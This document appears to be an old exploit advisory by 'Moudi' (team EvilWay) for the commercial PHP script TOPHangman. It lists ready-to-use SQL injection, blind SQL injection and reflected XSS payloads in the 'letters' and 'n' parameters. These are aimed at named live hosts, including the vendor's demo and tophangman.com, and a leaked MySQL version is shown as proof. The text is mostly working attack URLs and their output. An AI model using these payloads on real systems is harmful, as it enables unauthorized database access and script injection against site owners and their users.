==========
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==========
[»] TOPHangman Multiple Remote Vulnerabilities
==========
[»] Script: [ TOPHangman ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpscriptsnow.com/product_info.php?cPath=21&products_id=43 ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $19.99 ]
[»] Site : [ https://security-shell.ws/forum.php ]
##############
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?letters=A&n=[SQL]
[»] http://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=null+union+select+1,version()--
[»] http://tophangman.com/index.php?letters=A&n=null+union+select+1,version()--
RESULT : 5.0.67
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[»] http://www.site.com/patch/index.php?letters=A&n=[BLIND]
[»] http://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=5 TRUE
http://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=4 FALSE
http://www.phpscriptsnow.com/demo/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()--
SO MYSQL: V5
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/index.php?letters=[XSS]
[»] http://www.phpscriptsnow.com/demo/hangman/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601
[»] http://tophangman.com/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601
Author: Moudi
##############